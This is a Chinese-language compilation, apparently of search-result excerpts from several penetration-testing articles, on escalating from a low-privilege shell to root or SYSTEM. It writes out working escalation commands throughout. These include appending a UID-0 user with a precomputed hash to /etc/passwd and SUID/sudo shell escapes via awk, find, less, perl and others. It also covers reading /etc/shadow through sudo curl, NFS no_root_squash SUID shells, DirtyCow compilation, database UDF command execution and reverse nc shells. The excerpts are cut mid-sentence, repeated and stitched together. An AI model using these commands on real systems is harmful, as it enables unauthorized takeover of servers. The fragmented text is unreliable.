渗透场景当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行提权,以执行更多的操作,而在提权过程中发现当前用户具有/etc/passwd文件的写权限,此时我们可以写一个用户进去完成提权...基础知识用户分类在Linux下,用户分为三类:超级用户(root)、普通用户、程序用户超级用户:UID=0 程序用户:Rhel5/6,UID=1-499; Rhel7,UID=1-999 普通用户:Rhel5...提权流程确定可写首先查看/etc/passwd 的权限,发现任何用户都可以对/etc/passwd文件进行读写操作:ls -lh /etc/passwd写入用户接下来要做的就是自己构造一个用户,在密码占位符处指定密码...,并且UID设置为0,将其添加到/etc/passwd 文件中~首先使用perl语言生成带有盐值的密码:perl -le 'print crypt("password@123","addedsalt")...'然后执行下面这条命令,成功将test用户的信息加入/etc/passwd文件echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >
网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于用户自己的计算机上一样。.../ etc / exports 文件包含将哪些文件夹/文件系统导出到远程用户的配置和权限。...新建一个c文件。...bash"); return 0; }' > /tmp/test/suid-shell.c 编译: gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel 赋权:...好的,我们回到要提权的服务器上 cd / tmp ./suid-shell ? 可以看到是ROOT权限了
前言 实际环境中会遇到过很多有shell但是权限不够的情况,那么对于我这种对内核提权的知识只存在脏牛提权的懒狗来说,最方便快捷的方式就是拿脚本来批量看当前版本的内核有哪些可以利用的脚本 正文 先搭建个环境...上传自动根据内核看提权的脚本 github:https://github.com/mzet-/linux-exploit-suggester 通过一句话木马上传该.sh文件 ?
系统漏洞提权 1、获取操作系统版本号 2、根据版本号搜索exp 3、反弹shell 4、尝试利用 1、获取系统版本号: 获取发行版本 • cat /etc/issue • cat /etc/*-release...redhat-release 获取内核版本 • cat /proc/version • uname -a • uname -mrs • rpm -q kernel • dmesg | grep Linux
在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo可以提权。...在这里,我们可以通过调用一些二进制文件,这些文件可以帮助我们使用sudo命令提升特权。但是在特权升级之前,让我们了解一些sudoer文件语法,sudo命令是什么?;)。 什么是SUDO?...sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。...首先将Target的/ etc / passwd文件复制到攻击者计算机。 修改文件,并在上一步中保存的密码文件中添加用户到攻击者计算机。...仅附加此行=> touhid: 将passwd文件托管到使用任何Web服务器的主机。 在要提权主机方面。
系统漏洞提权 1、获取操作系统版本号 2、根据版本号搜索exp 3、反弹shell 4、尝试利用 1、获取系统版本号: 获取发行版本 • cat /etc/issue • cat /etc/*-release...redhat-release 获取内核版本 • cat /proc/version • uname -a • uname -mrs • rpm -q kernel • dmesg | grep Linux...推荐阅读 记一次曲折的Linux提权 https://www.freebuf.com/column/188852.html
前言 之前 红队视角下Linux信息收集 中提到过提权的信息收集命令,但没有细讲。本篇文章将着重于各种linux提权手段,总结提权的条件和原理。...--- 简单总结一下,红队的常规提权手段有: [1.png] 系统信息 按照上面提权的手段,梳理一下需收集的系统信息: 内核和发行版信息 系统信息 Hostname 网卡信息 路由信息 DNS信息 用户信息...列出inetd.conf / xined.conf内容和关联的二进制文件权限 列出init.d二进制权限 信息的命令都可以在之前的 红队视角下Linux信息收集 一文中找到,这里不再重复,简单介绍下sudo...--- 软件信息 如上,梳理一下收集的软件信息: 软件版本信息 sudo mysql udf提权 mof提权 postgres apache user config 启用的模块 htpassword文件...提权手段,并总结了sudo、suid和sgid的原理,具体利用手段没有涉及。
sudo 和 suid 提权 何为suid 可见在权限位置有一个s权限。那么这个s的作用是什么呢? 答案是当其他用户执行该文件时,该文件会以root的身份执行。.../shell nmap --script=shell 全版本通杀提权,利用nmap可以执行指定文件的特点提权 2.find find / -exec command find命令自带-exec参数,可以执行命令...这个提权方法的思想是,找到有suid的,内部有system函数调用未指定路径的命令的文件。.../shell 提权成功 密码查找 这个提权技术说白了,就是去到处翻密码 文件内查找 grep --color=auto -rnw '/' -ie "PASSWORD...是linux2.2后出现的产物,它的出现一定程度上弥补了suid这种粗糙的权限管理机制,但是capabilities 自身也有造成提权的安全隐患 简介 capabilities 把root的权限细分了
工具 脏牛(DirtyCow)提权漏洞 脏牛的CVE编号是CVE-2016-5195 脏牛(Dirty Cow)是Linux内核的一个提权漏洞,之所以叫Dirty Cow,Linux内核的内存子系统在处理写入复制...CVE-2016-5195-master.zip 查看接收的文件: 然后解压进入文件夹进行编译: 直接执行这个文件: 直接切换,输入对应的密码: 提权成功!!!...2、环境变量提权 PATH 是Linux 和 Unix 操作系统中的环境变量,定义了操作系统搜索可执行文件的目录顺序。如果PATH包含可写目录,攻击者可以在这些目录中放置恶意可执行文件。...3、明文root密码提权 利用/etc/passwd 、/etc/shadow 配置文件进行提权,主要是因为配置不当造成的提权。passwd是全用户可读,root可写的。...GTFOBins: 一个数据库,列出了可以用于提权的Linux二进制文件 Traitor: 一个自动化提权工具,可以利用sudo权限、docker配置不当等漏洞进行提权
权限、计划任务提权等方式进行提权 more提权 more 提权通常是指利用 more 命令的交互功能来尝试获取一个更高权限的 shell,尤其是在 Linux 或类 Unix 系统中 1、使用它来执行其他需要高权限的命令.../bin/sh less提权 less 提权是一种在Linux系统中利用具有SUID权限的less程序,来尝试执行高权限命令的方法。.../bin/sh nano提权 nano 提权是一种在Linux系统中利用具有SUID权限的nano文本编辑器来尝试获取更高权限的方法。如果nano命令具有SUID权限,它就可以被用来提权。...提权是一种在Linux系统中利用具有SUID权限的awk程序来尝试执行高权限命令的方法。...如果awk命令具有SUID权限,它就可以被用来提权 sudo awk 'BEGIN {system("/bin/bash")}' sudo提权 sudo 提权通常是指在Linux系统中,如果一个普通用户被授予了使用
可以使用sudo -l命令列出用户可以使用sudo运行的所有命令 ls 虽然是linux常见命令,但在寻找潜在的提权途径,使用-la参数显示隐藏文件(以点开头)以及更详细的文件权限和其他信息,以避免错过潜在的文件或目录...=/home/user/ldpreload/shell.so find SUID提权 许多 Linux 权限控制依赖于控制用户和文件交互。...Cron Jobs提权 Cron jobs用于在特定时间运行脚本或二进制文件。默认情况下,它们以其所有者而不是当前用户的权限运行。...PATH提权 Linux 中的 PATH 是一个环境变量,它告诉操作系统在哪里搜索可执行文件。...此提权的关键元素是文件中的no_root_squash选项。默认情况下,NFS会将root用户更改为nfsnobody,并阻止任何文件以root权限运行。
可以看到有147个小工具 psexec 这个工具可以以System账号执行一个程序 适合于本地提权 psexec -i -s cmd -i 使用交互模式运行程序 -s 使用SYSTEM账号来运行 ?...可以看到本地提权成功! 下面我来尝试远程提权,如果能够反弹一个System权限的nc连接,就算成功 ? 这个是拿XP做的实验,现在我们拿win10来测试一下 ?
提权就是一个低权限向高权限转化的过程 基于之前的文章,我们获取了一个低权限账户,现在朝着高权限进发 我们现在既然有了低权限账号密码,那么我们就可以登陆3389等远程服务,从而使用一些本地提权的方法 在开始提权之前...User Root 对于Linux来说,就只有两种权限,root,非root 其实对于非root也有两种情况,是否可以使用sudo 可以使用sudo的用户可以获取到部分root...权限 ---- at命令提权 这个方法相对来说有些古老,之前我在一些技术书籍中还能看到 at 命令提权的原理是at 命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限 Win2003...可以看到我们的权限已经是system了 这个是本地提权,我们看看能不能远程提权(3389属于本地提权了哈) 远程提权需要反弹一个system的shell,我们以nc为例 首先我们用echo命令吧需要执行的命令写入到批处理中...,之后定时执行批处理文件 最好把文件写入到没有空格的路径下,我把nc已经拷贝到c盘根目录了 ?
在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 通过以下命令可以找到存在...suid权限的文件 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find.../ -user root -perm -4000 -exec ls -ldb {} \; 可用于提权的文件有 nmap vim find bash more less nano cp image.png...利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户 passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell 这边可以看看root...用户的格式 root:x:0:0:root:/root:/bin/bash (密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里) image.png 生成密码:用openssl
ash也是一种shell,占用资源很少的,管理员可能开启 sudo ash awk是一个强大的文本分析工具 sudo awk 'BEGIN {system("/bin/sh")}' 使用这个命令可以直接提权到...root bash提权 bash sudo bash csh同样是一种shell sudo csh curl 提权 sudo curl file:///etc/shadow dash 一些小型设备可能安装...-exec /bin/sh \; -quit ftp less /etc/passwd 读取文件时执行文件sh !.../bin/sh' /dev/null zsh也属于shell中的一种,有一些Linux中会使用 sudo zsh pico用来编辑文本文件的 sudo pico ^R^X reset; sh 1>&...sudo perl -e 'exec "/bin/sh";' tclsh 脚本语言 sudo tclsh exec /bin/sh @stdout 2>@stderr git 提权
linux权限 user 普通权限 root 管理员权限 ? 提权类别 本地提权 配置提权 漏洞提权 本地提权 1.AT命令提权 首先以administrator身份打开cmd ?...COM对象 webshell版脚本 Juicypotato.exe –p whoami 脏牛提权 属于linux内核提权 下载现成的exp https://github.com/FireFart/dirtycow...然后编译生成一个可执行的文件 gcc -pthread dirty.c -o dirty -lcrypt 最后提权 巴西烤肉 net localgroup administrators admin123456...找到配置不当的文件 方法1 find / -perm 777 -exec ls -l {} \; -perm 777 :指定权限为777的文件 -exec ls-l : 对匹配的文件执行ls...应用连接数据库的配置文件下手 其它提权方式 数据库提权 1.my sql提权 ①.udf提权 1、知道root账号密码 2、win2000,2003系统 3、需要secure_file_priv函数打开
今天给大家带来的是linux下的提权技巧。SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。...如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。...已知的可用来提权的linux可行性的文件列表如下: Nmap Vim find Bash More Less Nano cp 以下命令可以发现系统上运行的所有SUID可执行文件。...提权至Root权限 也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。...Bash - Root权限 Less Less和More都执行以用来提权。 less /etc/passwd !/bin/sh more /home/pelle/myfile !
遇到了处接管Postgresql,但是........我tm竟然没有用他来提权。后来经大哥提醒才知道这里可以利用UDF进行提权。遂为了下一次不再翻车,写下这篇笔记。...without-readline --without-zlibmakemake install图片接下来我们需要下载这postgresql_udf_help工具并利用他的代码和刚才下载的环境去编译.so文件以及做些其他操作...(这里我不建议用sqlmap自带的.so文件,bo主用他的.so去操作的话会报ERROR: could not load library invalid ELF header).下载后就开始编译.so文件...postgresqludf\_sys.c -fPIC -o lib\_postgresqludf\_sys.sostrip -sx lib\_postgresqludf\_sys.so图片接下来输出.so文件的十六进制并利用...text AS '/tmp/testeval.so', 'sys\_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;图片最后尝试执行命令,成功提权图片
‘.dll’,常用c语言编写 UDF提权原理 用户可以自定义提权的函数(比如执行系统命令)来进行提权。...UDF提权条件 1.Mysql版本大于5.1时,udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。...使用蚁剑上传LinEnum.sh脚本进行提权信息收集 上传到tmp目录下 image.png 运行脚本发现有mysql数据库,且无法直接使用SUID提权 查找数据库配置文件(/var/www/html.../wordpress/wp-config.php) image.png 账号root,密码R3v3nSecurity 使用蚁剑登录mysql数据库,进行mysql udf提权 kali上搜索Linux...udf提权脚本 image.png 将脚本文件在本地进行编译后上传到靶机的/tmp目录下 gcc -g -c 1518.c gcc -g -shared -o 1518.so 1518.o 将1518
0x001 linux提权描述 大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。...提权-内核漏洞提权 通过利用Linux内核中的漏洞,有时我们可以提升特权。...0x006 linux提权-Suid和Guid配置错误 描述 SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。...0x008 linux提权-通配符注入 通配符是代表其他字符的符号。您可以将它们与任何命令(例如cat或rm命令)一起使用,以列出或删除符合给定条件的文件。.../suid-shell 可以看到是ROOT权限了 0x0010 linux提权-利用“.”路径配置错误 有“.” 在PATH中表示用户可以从当前目录执行二进制文件/脚本。
领取专属 10元无门槛券
手把手带您无忧上云